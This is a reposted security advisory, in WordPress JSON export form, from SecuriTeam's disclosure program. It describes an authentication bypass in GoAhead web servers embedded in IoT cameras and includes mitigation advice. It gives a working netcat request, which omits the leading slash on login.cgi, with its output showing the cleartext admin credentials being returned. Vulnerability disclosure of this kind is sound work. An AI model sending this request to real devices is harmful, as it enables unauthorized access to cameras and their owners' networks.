{"id":6925,"date":"2017-03-09T14:19:30","date_gmt":"2017-03-09T22:19:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/09\/news-716\/"},"modified":"2017-03-09T14:19:30","modified_gmt":"2017-03-09T22:19:30","slug":"news-716","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/09\/news-716\/","title":{"rendered":"SSD Advisory &#8211; Over 100K IoT Cameras Vulnerable to Source Disclosure"},"content":{"rendered":"<p><strong>Credit to Author: noam| Date: Thu, 09 Mar 2017 08:34:23 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an arbitrary file content disclosure vulnerability found in GoAhead web server.<\/p>\n<p>The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices.<\/p>\n<p>The vulnerability allows a remote unauthenticated attacker to disclose the content of the file being accessed. As most embedded devices do not run a SQL (or SQL-like) daemon, the credentials for authentication are stored inside the file being accessed. 
Through this disclosure attack, an attacker can view the credentials required to access the device.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Istvan Toth, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Update: the vendor (GoAhead) claims the vulnerability is not in its product, but rather in the camera vendor&#8217;s code.<\/p>\n<p>We at Beyond Security are unsure about this, but as none of the camera vendors responded, we are left in the dark as to the root cause of the vulnerability.<\/p>\n<p>Since this vulnerability affects a large number of devices that run the GoAhead web server (these devices appear to embed old versions of GoAhead), there is no single company to which these vulnerabilities can be reported or which can get them addressed; furthermore, the majority of the vulnerable products are OEM products with no real &#8220;vendor&#8221; behind them.<\/p>\n<p>We urge users who have an embedded device running GoAhead (you can recognize it by the following banner returned when you connect to the device):<\/p>\n<pre>Server: GoAhead-Webs<\/pre>\n<p>to remove the device from the network, or at the very least to restrict access to the web interface to a very strict IP address range.<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The vulnerability is triggered by sending a malformed request to the web server; the difference between a regular request and the vulnerability-triggering request is shown below:<\/p>\n<p><em>Normal request-response<\/em><\/p>\n<pre>$ echo -e \"GET \/login.cgi\\n\" | nc 192.168.88.131 81\nnc: using stream socket\nHTTP\/1.1 401 Unauthorized\nServer: GoAhead-Webs\nDate: Sun Feb 19 12:59:31 2017\nWWW-Authenticate: Digest realm=\"GoAhead\", domain=\":81\",qop=\"auth\", nonce=\"ecfe10f4065c572c386bf68494d0c15a\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\",algorithm=\"MD5\", stale=\"FALSE\"\nPragma: no-cache\nCache-Control: no-cache\nContent-Type: text\/html\n\n&lt;html&gt;&lt;head&gt;&lt;title&gt;Document Error: Unauthorized&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;&lt;h2&gt;Access Error: Unauthorized&lt;\/h2&gt;\n&lt;p&gt;Access to this document requires a User ID&lt;\/p&gt;&lt;\/body&gt;&lt;\/html&gt;<\/pre>\n<p><em>Vulnerability triggering request-response<\/em><br \/> A request without the leading &#8216;\/&#8217; bypasses the HTTP authentication. Moreover, requesting login.cgi returns the cleartext credentials:<\/p>\n<pre>$ echo -e \"GET login.cgi\\n\" | nc 192.168.88.131 81\nnc: using stream socket\nHTTP\/1.1 200 OK\nDate: Sun Feb 19 12:59:36 2017\nServer: GoAhead-Webs\nLast-modified: Thu Jan 1 00:00:00 1970\nContent-type: text\/html\nCache-Control:no-cache\nContent-length: 77\nConnection: close\n\nvar loginuser=\"admin\";\n\nvar loginpass=\"xxxx\";\n\nvar pri=255;<\/pre>\n<\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3043\" target=\"bwo\" 
>https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: noam| Date: Thu, 09 Mar 2017 08:34:23 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an arbitrary file content disclosure vulnerability found in GoAhead web server. The GoAhead web server is present on multiple embedded devices, from IP Cameras to Printers and other embedded devices. The vulnerability allows a remote unauthenticated attacker to disclose the content of the file being accessed. As most embedded &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3043\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; Over 100K IoT Cameras Vulnerable to Source Disclosure<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,10757],"class_list":["post-6925","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6925"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6925\/revision
s"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6925"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}